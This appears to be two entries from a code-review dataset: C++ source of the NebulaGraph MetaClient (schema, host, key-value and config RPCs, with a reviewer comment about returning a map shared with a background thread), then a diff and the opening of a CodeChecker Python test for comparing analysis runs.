auto newPartsMap = doGetPartsMap(localHost_, newCache);
auto oldPartsMap = doGetPartsMap(localHost_, oldCache);
VLOG(1) << "Let's check if any new parts added/updated for " << localHost_;
for (auto it = newPartsMap.begin(); it != newPartsMap.end(); it++) {
auto spaceId = it->first;
const auto& newParts = it->second;
auto oldIt = oldPartsMap.find(spaceId);
if (oldIt == oldPartsMap.end()) {
VLOG(1) << "SpaceId " << spaceId << " was added!";
listener_->onSpaceAdded(spaceId);
for (auto partIt = newParts.begin(); partIt != newParts.end(); partIt++) {
listener_->onPartAdded(partIt->second);
}
} else {
const auto& oldParts = oldIt->second;
for (auto partIt = newParts.begin(); partIt != newParts.end(); partIt++) {
auto oldPartIt = oldParts.find(partIt->first);
if (oldPartIt == oldParts.end()) {
VLOG(1) << "SpaceId " << spaceId << ", partId "
<< partIt->first << " was added!";
listener_->onPartAdded(partIt->second);
} else {
const auto& oldPartMeta = oldPartIt->second;
const auto& newPartMeta = partIt->second;
if (oldPartMeta != newPartMeta) {
VLOG(1) << "SpaceId " << spaceId
<< ", partId " << partIt->first << " was updated!";
listener_->onPartUpdated(newPartMeta);
}
}
}
}
}
VLOG(1) << "Let's check if any old parts removed....";
for (auto it = oldPartsMap.begin(); it != oldPartsMap.end(); it++) {
auto spaceId = it->first;
const auto& oldParts = it->second;
auto newIt = newPartsMap.find(spaceId);
if (newIt == newPartsMap.end()) {
VLOG(1) << "SpaceId " << spaceId << " was removed!";
for (auto partIt = oldParts.begin(); partIt != oldParts.end(); partIt++) {
listener_->onPartRemoved(spaceId, partIt->first);
}
listener_->onSpaceRemoved(spaceId);
} else {
const auto& newParts = newIt->second;
for (auto partIt = oldParts.begin(); partIt != oldParts.end(); partIt++) {
auto newPartIt = newParts.find(partIt->first);
if (newPartIt == newParts.end()) {
VLOG(1) << "SpaceId " << spaceId
<< ", partId " << partIt->first << " was removed!";
listener_->onPartRemoved(spaceId, partIt->first);
}
}
}
}
}
/// ================================== public methods =================================
folly::Future<StatusOr<GraphSpaceID>>
MetaClient::createSpace(std::string name, int32_t partsNum, int32_t replicaFactor) {
cpp2::SpaceProperties properties;
properties.set_space_name(std::move(name));
properties.set_partition_num(partsNum);
properties.set_replica_factor(replicaFactor);
cpp2::CreateSpaceReq req;
req.set_properties(std::move(properties));
folly::Promise<StatusOr<GraphSpaceID>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_createSpace(request);
}, [] (cpp2::ExecResp&& resp) -> GraphSpaceID {
return resp.get_id().get_space_id();
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<std::vector<SpaceIdName>>> MetaClient::listSpaces() {
cpp2::ListSpacesReq req;
folly::Promise<StatusOr<std::vector<SpaceIdName>>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_listSpaces(request);
}, [this] (cpp2::ListSpacesResp&& resp) -> decltype(auto) {
return this->toSpaceIdName(resp.get_spaces());
}, std::move(promise));
return future;
}
folly::Future<StatusOr<cpp2::SpaceItem>>
MetaClient::getSpace(std::string name) {
cpp2::GetSpaceReq req;
req.set_space_name(std::move(name));
folly::Promise<StatusOr<cpp2::SpaceItem>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_getSpace(request);
}, [] (cpp2::GetSpaceResp&& resp) -> decltype(auto) {
return std::move(resp).get_item();
}, std::move(promise));
return future;
}
folly::Future<StatusOr<bool>> MetaClient::dropSpace(std::string name) {
cpp2::DropSpaceReq req;
req.set_space_name(std::move(name));
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_dropSpace(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<bool>> MetaClient::addHosts(const std::vector<HostAddr>& hosts) {
std::vector<nebula::cpp2::HostAddr> thriftHosts;
thriftHosts.resize(hosts.size());
std::transform(hosts.begin(), hosts.end(), thriftHosts.begin(), [](const auto& h) {
nebula::cpp2::HostAddr th;
th.set_ip(h.first);
th.set_port(h.second);
return th;
});
cpp2::AddHostsReq req;
req.set_hosts(std::move(thriftHosts));
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_addHosts(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<std::vector<cpp2::HostItem>>> MetaClient::listHosts() {
cpp2::ListHostsReq req;
folly::Promise<StatusOr<std::vector<cpp2::HostItem>>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_listHosts(request);
}, [] (cpp2::ListHostsResp&& resp) -> decltype(auto) {
return resp.hosts;
}, std::move(promise));
return future;
}
folly::Future<StatusOr<bool>> MetaClient::removeHosts(const std::vector<HostAddr>& hosts) {
std::vector<nebula::cpp2::HostAddr> thriftHosts;
thriftHosts.resize(hosts.size());
std::transform(hosts.begin(), hosts.end(), thriftHosts.begin(), [](const auto& h) {
nebula::cpp2::HostAddr th;
th.set_ip(h.first);
th.set_port(h.second);
return th;
});
cpp2::RemoveHostsReq req;
req.set_hosts(std::move(thriftHosts));
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_removeHosts(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<std::unordered_map<PartitionID, std::vector<HostAddr>>>>
MetaClient::getPartsAlloc(GraphSpaceID spaceId) {
cpp2::GetPartsAllocReq req;
req.set_space_id(spaceId);
folly::Promise<StatusOr<std::unordered_map<PartitionID, std::vector<HostAddr>>>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_getPartsAlloc(request);
}, [this] (cpp2::GetPartsAllocResp&& resp) -> decltype(auto) {
std::unordered_map<PartitionID, std::vector<HostAddr>> parts;
for (auto it = resp.parts.begin(); it != resp.parts.end(); it++) {
parts.emplace(it->first, to(it->second));
}
return parts;
}, std::move(promise));
return future;
}
StatusOr<GraphSpaceID>
MetaClient::getSpaceIdByNameFromCache(const std::string& name) {
if (!ready_) {
return Status::Error("Not ready!");
}
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = spaceIndexByName_.find(name);
if (it != spaceIndexByName_.end()) {
return it->second;
}
return Status::SpaceNotFound();
}
StatusOr<TagID> MetaClient::getTagIDByNameFromCache(const GraphSpaceID& space,
const std::string& name) {
if (!ready_) {
return Status::Error("Not ready!");
}
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = spaceTagIndexByName_.find(std::make_pair(space, name));
if (it == spaceTagIndexByName_.end()) {
return Status::Error("Tag is not exist!");
}
return it->second;
}
StatusOr<EdgeType> MetaClient::getEdgeTypeByNameFromCache(const GraphSpaceID& space,
const std::string& name) {
if (!ready_) {
return Status::Error("Not ready!");
}
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = spaceEdgeIndexByName_.find(std::make_pair(space, name));
if (it == spaceEdgeIndexByName_.end()) {
return Status::Error("Edge is no exist!");
}
return it->second;
}
StatusOr<std::string> MetaClient::getEdgeNameByTypeFromCache(const GraphSpaceID& space,
const EdgeType edgeType) {
if (!ready_) {
return Status::Error("Not ready!");
}
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = spaceEdgeIndexByType_.find(std::make_pair(space, edgeType));
if (it == spaceEdgeIndexByType_.end()) {
return Status::Error("Edge is no exist!");
}
return it->second;
}
StatusOr<std::vector<std::string>> MetaClient::getAllEdgeFromCache(const GraphSpaceID& space) {
if (!ready_) {
return Status::Error("Not ready!");
}
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = spaceAllEdgeMap_.find(space);
if (it == spaceAllEdgeMap_.end()) {
return Status::Error("Edge is no exist!");
}
return it->second;
}
folly::Future<StatusOr<bool>>
MetaClient::multiPut(std::string segment,
std::vector<std::pair<std::string, std::string>> pairs) {
if (!nebula::meta::MetaCommon::checkSegment(segment)
|| pairs.empty()) {
return Status::Error("arguments invalid!");
}
cpp2::MultiPutReq req;
std::vector<cpp2::Pair> data;
for (auto& element : pairs) {
data.emplace_back(apache::thrift::FragileConstructor::FRAGILE,
std::move(element.first), std::move(element.second));
}
req.set_segment(std::move(segment));
req.set_pairs(std::move(data));
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_multiPut(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<std::string>>
MetaClient::get(std::string segment, std::string key) {
if (!nebula::meta::MetaCommon::checkSegment(segment)
|| key.empty()) {
return Status::Error("arguments invalid!");
}
cpp2::GetReq req;
req.set_segment(std::move(segment));
req.set_key(std::move(key));
folly::Promise<StatusOr<std::string>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_get(request);
}, [] (cpp2::GetResp&& resp) -> std::string {
return resp.get_value();
}, std::move(promise));
return future;
}
folly::Future<StatusOr<std::vector<std::string>>>
MetaClient::multiGet(std::string segment, std::vector<std::string> keys) {
if (!nebula::meta::MetaCommon::checkSegment(segment)
|| keys.empty()) {
return Status::Error("arguments invalid!");
}
cpp2::MultiGetReq req;
req.set_segment(std::move(segment));
req.set_keys(std::move(keys));
folly::Promise<StatusOr<std::vector<std::string>>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_multiGet(request);
}, [] (cpp2::MultiGetResp&& resp) -> std::vector<std::string> {
return resp.get_values();
}, std::move(promise));
return future;
}
folly::Future<StatusOr<std::vector<std::string>>>
MetaClient::scan(std::string segment, std::string start, std::string end) {
if (!nebula::meta::MetaCommon::checkSegment(segment)
|| start.empty() || end.empty()) {
return Status::Error("arguments invalid!");
}
cpp2::ScanReq req;
req.set_segment(std::move(segment));
req.set_start(std::move(start));
req.set_end(std::move(end));
folly::Promise<StatusOr<std::vector<std::string>>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_scan(request);
}, [] (cpp2::ScanResp&& resp) -> std::vector<std::string> {
return resp.get_values();
}, std::move(promise));
return future;
}
folly::Future<StatusOr<bool>>
MetaClient::remove(std::string segment, std::string key) {
if (!nebula::meta::MetaCommon::checkSegment(segment)
|| key.empty()) {
return Status::Error("arguments invalid!");
}
cpp2::RemoveReq req;
req.set_segment(std::move(segment));
req.set_key(std::move(key));
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_remove(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<bool>>
MetaClient::removeRange(std::string segment, std::string start, std::string end) {
if (!nebula::meta::MetaCommon::checkSegment(segment)
|| start.empty() || end.empty()) {
return Status::Error("arguments invalid!");
}
cpp2::RemoveRangeReq req;
req.set_segment(std::move(segment));
req.set_start(std::move(start));
req.set_end(std::move(end));
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_removeRange(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
PartsMap MetaClient::getPartsMapFromCache(const HostAddr& host) {
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
return doGetPartsMap(host, localCache_);
}
PartMeta MetaClient::getPartMetaFromCache(GraphSpaceID spaceId, PartitionID partId) {
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = localCache_.find(spaceId);
CHECK(it != localCache_.end());
auto& cache = it->second;
auto partAllocIter = cache->partsAlloc_.find(partId);
CHECK(partAllocIter != cache->partsAlloc_.end());
PartMeta pm;
pm.spaceId_ = spaceId;
pm.partId_ = partId;
pm.peers_ = partAllocIter->second;
return pm;
}
bool MetaClient::checkPartExistInCache(const HostAddr& host,
GraphSpaceID spaceId,
PartitionID partId) {
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = localCache_.find(spaceId);
if (it != localCache_.end()) {
auto partsIt = it->second->partsOnHost_.find(host);
if (partsIt != it->second->partsOnHost_.end()) {
for (auto& pId : partsIt->second) {
if (pId == partId) {
return true;
}
}
}
}
return false;
}
bool MetaClient::checkSpaceExistInCache(const HostAddr& host,
GraphSpaceID spaceId) {
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = localCache_.find(spaceId);
if (it != localCache_.end()) {
auto partsIt = it->second->partsOnHost_.find(host);
if (partsIt != it->second->partsOnHost_.end() && !partsIt->second.empty()) {
return true;
}
}
return false;
}
int32_t MetaClient::partsNum(GraphSpaceID spaceId) {
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = localCache_.find(spaceId);
CHECK(it != localCache_.end());
return it->second->partsAlloc_.size();
}
folly::Future<StatusOr<TagID>>
MetaClient::createTagSchema(GraphSpaceID spaceId, std::string name, nebula::cpp2::Schema schema) {
cpp2::CreateTagReq req;
req.set_space_id(std::move(spaceId));
req.set_tag_name(std::move(name));
req.set_schema(std::move(schema));
folly::Promise<StatusOr<TagID>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_createTag(request);
}, [] (cpp2::ExecResp&& resp) -> TagID {
return resp.get_id().get_tag_id();
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<TagID>>
MetaClient::alterTagSchema(GraphSpaceID spaceId,
std::string name,
std::vector<cpp2::AlterSchemaItem> items,
nebula::cpp2::SchemaProp schemaProp) {
cpp2::AlterTagReq req;
req.set_space_id(std::move(spaceId));
req.set_tag_name(std::move(name));
req.set_tag_items(std::move(items));
req.set_schema_prop(std::move(schemaProp));
folly::Promise<StatusOr<TagID>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_alterTag(request);
}, [] (cpp2::ExecResp&& resp) -> TagID {
return resp.get_id().get_tag_id();
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<std::vector<cpp2::TagItem>>>
MetaClient::listTagSchemas(GraphSpaceID spaceId) {
cpp2::ListTagsReq req;
req.set_space_id(std::move(spaceId));
folly::Promise<StatusOr<std::vector<cpp2::TagItem>>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_listTags(request);
}, [] (cpp2::ListTagsResp&& resp) -> decltype(auto){
return std::move(resp).get_tags();
}, std::move(promise));
return future;
}
folly::Future<StatusOr<bool>>
MetaClient::dropTagSchema(int32_t spaceId, std::string tagName) {
cpp2::DropTagReq req;
req.set_space_id(spaceId);
req.set_tag_name(std::move(tagName));
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_dropTag(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<nebula::cpp2::Schema>>
MetaClient::getTagSchema(int32_t spaceId, std::string name, int64_t version) {
cpp2::GetTagReq req;
req.set_space_id(spaceId);
req.set_tag_name(std::move(name));
req.set_version(version);
folly::Promise<StatusOr<nebula::cpp2::Schema>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_getTag(request);
}, [] (cpp2::GetTagResp&& resp) -> nebula::cpp2::Schema {
return std::move(resp).get_schema();
}, std::move(promise));
return future;
}
folly::Future<StatusOr<EdgeType>>
MetaClient::createEdgeSchema(GraphSpaceID spaceId, std::string name, nebula::cpp2::Schema schema) {
cpp2::CreateEdgeReq req;
req.set_space_id(std::move(spaceId));
req.set_edge_name(std::move(name));
req.set_schema(schema);
folly::Promise<StatusOr<EdgeType>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_createEdge(request);
}, [] (cpp2::ExecResp&& resp) -> EdgeType {
return resp.get_id().get_edge_type();
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<bool>>
MetaClient::alterEdgeSchema(GraphSpaceID spaceId,
std::string name,
std::vector<cpp2::AlterSchemaItem> items,
nebula::cpp2::SchemaProp schemaProp) {
cpp2::AlterEdgeReq req;
req.set_space_id(std::move(spaceId));
req.set_edge_name(std::move(name));
req.set_edge_items(std::move(items));
req.set_schema_prop(std::move(schemaProp));
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_alterEdge(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<std::vector<cpp2::EdgeItem>>>
MetaClient::listEdgeSchemas(GraphSpaceID spaceId) {
cpp2::ListEdgesReq req;
req.set_space_id(std::move(spaceId));
folly::Promise<StatusOr<std::vector<cpp2::EdgeItem>>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_listEdges(request);
}, [] (cpp2::ListEdgesResp&& resp) -> decltype(auto) {
return std::move(resp).get_edges();
}, std::move(promise));
return future;
}
folly::Future<StatusOr<nebula::cpp2::Schema>>
MetaClient::getEdgeSchema(GraphSpaceID spaceId, std::string name, SchemaVer version) {
cpp2::GetEdgeReq req;
req.set_space_id(std::move(spaceId));
req.set_edge_name(std::move(name));
req.set_version(version);
folly::Promise<StatusOr<nebula::cpp2::Schema>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_getEdge(request);
}, [] (cpp2::GetEdgeResp&& resp) -> nebula::cpp2::Schema {
return std::move(resp).get_schema();
}, std::move(promise));
return future;
}
folly::Future<StatusOr<bool>>
MetaClient::dropEdgeSchema(GraphSpaceID spaceId, std::string name) {
cpp2::DropEdgeReq req;
req.set_space_id(std::move(spaceId));
req.set_edge_name(std::move(name));
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_dropEdge(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
StatusOr<std::shared_ptr<const SchemaProviderIf>>
MetaClient::getTagSchemaFromCache(GraphSpaceID spaceId, TagID tagID, SchemaVer ver) {
if (!ready_) {
return Status::Error("Not ready!");
}
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto spaceIt = localCache_.find(spaceId);
if (spaceIt == localCache_.end()) {
// Not found
return std::shared_ptr<const SchemaProviderIf>();
} else {
auto tagIt = spaceIt->second->tagSchemas_.find(std::make_pair(tagID, ver));
if (tagIt == spaceIt->second->tagSchemas_.end()) {
return std::shared_ptr<const SchemaProviderIf>();
} else {
return tagIt->second;
}
}
}
StatusOr<std::shared_ptr<const SchemaProviderIf>> MetaClient::getEdgeSchemaFromCache(
GraphSpaceID spaceId, EdgeType edgeType, SchemaVer ver) {
if (!ready_) {
return Status::Error("Not ready!");
}
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto spaceIt = localCache_.find(spaceId);
if (spaceIt == localCache_.end()) {
// Not found
VLOG(3) << "Space " << spaceId << " not found!";
return std::shared_ptr<const SchemaProviderIf>();
} else {
auto edgeIt = spaceIt->second->edgeSchemas_.find(std::make_pair(edgeType, ver));
if (edgeIt == spaceIt->second->edgeSchemas_.end()) {
VLOG(3) << "Space " << spaceId << ", EdgeType " << edgeType << ", version "
<< ver << " not found!";
return std::shared_ptr<const SchemaProviderIf>();
} else {
return edgeIt->second;
}
}
}
const std::vector<HostAddr>& MetaClient::getAddresses() {
return addrs_;
}
StatusOr<SchemaVer> MetaClient::getNewestTagVerFromCache(const GraphSpaceID& space,
const TagID& tagId) {
if (!ready_) {
return Status::Error("Not ready!");
}
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = spaceNewestTagVerMap_.find(std::make_pair(space, tagId));
if (it == spaceNewestTagVerMap_.end()) {
return -1;
}
return it->second;
}
StatusOr<SchemaVer> MetaClient::getNewestEdgeVerFromCache(const GraphSpaceID& space,
const EdgeType& edgeType) {
if (!ready_) {
return Status::Error("Not ready!");
}
folly::RWSpinLock::ReadHolder holder(localCacheLock_);
auto it = spaceNewestEdgeVerMap_.find(std::make_pair(space, edgeType));
if (it == spaceNewestEdgeVerMap_.end()) {
return -1;
}
return it->second;
}
folly::Future<StatusOr<bool>> MetaClient::heartbeat() {
if (clusterId_.load() == 0) {
clusterId_ = ClusterIdMan::getClusterIdFromFile(FLAGS_cluster_id_path);
}
cpp2::HBReq req;
nebula::cpp2::HostAddr thriftHost;
thriftHost.set_ip(localHost_.first);
thriftHost.set_port(localHost_.second);
req.set_host(std::move(thriftHost));
req.set_cluster_id(clusterId_.load());
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
LOG(INFO) << "Send heartbeat to " << leader_ << ", clusterId " << req.get_cluster_id();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_heartBeat(request);
}, [this] (cpp2::HBResp&& resp) -> bool {
if (clusterId_.load() == 0) {
LOG(INFO) << "Persisit the cluster Id from metad " << resp.get_cluster_id();
if (ClusterIdMan::persistInFile(resp.get_cluster_id(),
FLAGS_cluster_id_path)) {
clusterId_.store(resp.get_cluster_id());
} else {
LOG(FATAL) << "Can't persist the clusterId in file "
<< FLAGS_cluster_id_path;
}
}
return true;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<int64_t>> MetaClient::balance() {
cpp2::BalanceReq req;
folly::Promise<StatusOr<int64_t>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_balance(request);
}, [] (cpp2::BalanceResp&& resp) -> int64_t {
return resp.id;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<bool>> MetaClient::balanceLeader() {
cpp2::LeaderBalanceReq req;
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_leaderBalance(request);
}, [] (cpp2::ExecResp&& resp) -> bool {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<bool>>
MetaClient::regConfig(const std::vector<cpp2::ConfigItem>& items) {
cpp2::RegConfigReq req;
req.set_items(items);
folly::Promise<StatusOr<int64_t>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_regConfig(request);
}, [] (cpp2::ExecResp&& resp) -> decltype(auto) {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<std::vector<cpp2::ConfigItem>>>
MetaClient::getConfig(const cpp2::ConfigModule& module, const std::string& name) {
if (!configReady_) {
return Status::Error("Not ready!");
}
cpp2::ConfigItem item;
item.set_module(module);
item.set_name(name);
cpp2::GetConfigReq req;
req.set_item(item);
folly::Promise<StatusOr<std::vector<cpp2::ConfigItem>>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_getConfig(request);
}, [] (cpp2::GetConfigResp&& resp) -> decltype(auto) {
return std::move(resp).get_items();
}, std::move(promise));
return future;
}
folly::Future<StatusOr<bool>>
MetaClient::setConfig(const cpp2::ConfigModule& module, const std::string& name,
const cpp2::ConfigType& type, const std::string& value) {
if (!configReady_) {
return Status::Error("Not ready!");
}
cpp2::ConfigItem item;
item.set_module(module);
item.set_name(name);
item.set_type(type);
item.set_mode(cpp2::ConfigMode::MUTABLE);
item.set_value(value);
cpp2::SetConfigReq req;
req.set_item(item);
folly::Promise<StatusOr<bool>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_setConfig(request);
}, [] (cpp2::ExecResp&& resp) -> decltype(auto) {
return resp.code == cpp2::ErrorCode::SUCCEEDED;
}, std::move(promise), true);
return future;
}
folly::Future<StatusOr<std::vector<cpp2::ConfigItem>>>
MetaClient::listConfigs(const cpp2::ConfigModule& module) {
if (!configReady_) {
return Status::Error("Not ready!");
}
cpp2::ListConfigsReq req;
req.set_module(module);
folly::Promise<StatusOr<std::vector<cpp2::ConfigItem>>> promise;
auto future = promise.getFuture();
getResponse(std::move(req), [] (auto client, auto request) {
return client->future_listConfigs(request);
}, [] (cpp2::ListConfigsResp&& resp) -> decltype(auto) {
return std::move(resp).get_items();
}, std::move(promise));
return future;
}
void MetaClient::loadCfgThreadFunc() {
loadCfg();
addLoadCfgTask();
}
bool MetaClient::registerCfg() {
auto ret = regConfig(gflagsDeclared_).get();
if (ret.ok()) {
LOG(INFO) << "Register gflags ok " << gflagsDeclared_.size();
configReady_ = true;
}
return configReady_;
}
void MetaClient::loadCfg() {
if (!configReady_ && !registerCfg()) {
return;
}
// only load current module's config is enough
auto ret = listConfigs(gflagsModule_).get();
if (ret.ok()) {
// if we load config from meta server successfully, update gflags and set configReady_
auto tItems = ret.value();
std::vector<ConfigItem> items;
for (const auto& tItem : tItems) {
items.emplace_back(toConfigItem(tItem));
}
MetaConfigMap metaConfigMap;
for (auto& item : items) {
std::pair<cpp2::ConfigModule, std::string> key = {item.module_, item.name_};
metaConfigMap.emplace(std::move(key), std::move(item));
}
{
// For any configurations that is in meta, update in cache to replace previous value
folly::RWSpinLock::WriteHolder holder(configCacheLock_);
for (const auto& entry : metaConfigMap) {
auto& key = entry.first;
auto it = metaConfigMap_.find(key);
if (it == metaConfigMap_.end() || metaConfigMap[key].value_ != it->second.value_) {
updateGflagsValue(entry.second);
LOG(INFO) << "update config in cache " << key.second
<< " to " << metaConfigMap[key].value_;
metaConfigMap_[key] = entry.second;
}
}
}
} else {
LOG(INFO) << "Load configs failed: " << ret.status();
return;
}
}
void MetaClient::addLoadCfgTask() {
size_t delayMS = FLAGS_load_data_interval_secs * 1000 + folly::Random::rand32(900);
bgThread_->addDelayTask(delayMS, &MetaClient::loadCfgThreadFunc, this);
LOG(INFO) << "Load configs completed, call after " << delayMS << " ms";
}
void MetaClient::updateGflagsValue(const ConfigItem& item) {
if (item.mode_ != cpp2::ConfigMode::MUTABLE) {
return;
}
std::string metaValue;
switch (item.type_) {
case cpp2::ConfigType::INT64:
metaValue = folly::to<std::string>(boost::get<int64_t>(item.value_));
break;
case cpp2::ConfigType::DOUBLE:
metaValue = folly::to<std::string>(boost::get<double>(item.value_));
break;
case cpp2::ConfigType::BOOL:
metaValue = boost::get<bool>(item.value_) ? "true" : "false";
break;
case cpp2::ConfigType::STRING:
metaValue = boost::get<std::string>(item.value_);
break;
}
std::string curValue;
if (!gflags::GetCommandLineOption(item.name_.c_str(), &curValue)) {
return;
} else if (curValue != metaValue) {
LOG(INFO) << "update " << item.name_ << " from " << curValue << " to " << metaValue;
gflags::SetCommandLineOption(item.name_.c_str(), metaValue.c_str());
}
}
ConfigItem MetaClient::toConfigItem(const cpp2::ConfigItem& item) {
VariantType value;
switch (item.get_type()) {
case cpp2::ConfigType::INT64:
value = *reinterpret_cast<const int64_t*>(item.get_value().data());
break;
case cpp2::ConfigType::BOOL:
value = *reinterpret_cast<const bool*>(item.get_value().data());
break;
case cpp2::ConfigType::DOUBLE:
value = *reinterpret_cast<const double*>(item.get_value().data());
break;
case cpp2::ConfigType::STRING:
value = item.get_value();
break;
}
return ConfigItem(item.get_module(), item.get_name(), item.get_type(), item.get_mode(), value);
}
} // namespace meta
} // namespace nebula
| 1 | 21,871 | maybe can not return a map directly, it will be modified by inner thread. | vesoft-inc-nebula | cpp |
@@ -299,7 +299,7 @@ class Diff(unittest.TestCase):
cmp_data)
# Unesolved core checkers.
test_res = {'core.NullDereference': 4, 'core.DivideZero': 3}
- self.assertDictEqual(diff_res, test_res)
+ self.assertDictContainsSubset(test_res, diff_res)
def test_get_diff_checker_counts_all_unresolved(self):
""" | 1 | #
# -----------------------------------------------------------------------------
# The CodeChecker Infrastructure
# This file is distributed under the University of Illinois Open Source
# License. See LICENSE.TXT for details.
# -----------------------------------------------------------------------------
"""
Diff feature tests. Comparing results from two runs.
"""
import os
import unittest
import logging
import re
import shared
import subprocess
from codeCheckerDBAccess.ttypes import DiffType
from codeCheckerDBAccess.ttypes import CompareData
from codeCheckerDBAccess.ttypes import ReportFilter_v2
from libtest.thrift_client_to_db import get_all_run_results_v2
from libtest.debug_printer import print_run_results
from libtest import env
def get_severity_level(name):
"""
Convert severity level from the name to value.
"""
return shared.ttypes.Severity._NAMES_TO_VALUES[name]
class Diff(unittest.TestCase):
_ccClient = None
def setUp(self):
test_workspace = os.environ['TEST_WORKSPACE']
test_class = self.__class__.__name__
print('Running ' + test_class + ' tests in ' + test_workspace)
# Get the clang version which is tested.
self._clang_to_test = env.clang_to_test()
self._testproject_data = env.setup_test_proj_cfg(test_workspace)
self.assertIsNotNone(self._testproject_data)
self._cc_client = env.setup_viewer_client(test_workspace)
self.assertIsNotNone(self._cc_client)
# Get the run names which belong to this test.
run_names = env.get_run_names(test_workspace)
runs = self._cc_client.getRunData(None)
test_runs = [run for run in runs if run.name in run_names]
for r in test_runs:
print(r)
# There should be at least two runs for this test.
self.assertIsNotNone(runs)
self.assertNotEqual(len(runs), 0)
self.assertGreaterEqual(len(runs), 2)
# Name order matters from __init__ !
self._base_runid = test_runs[0].runId # base
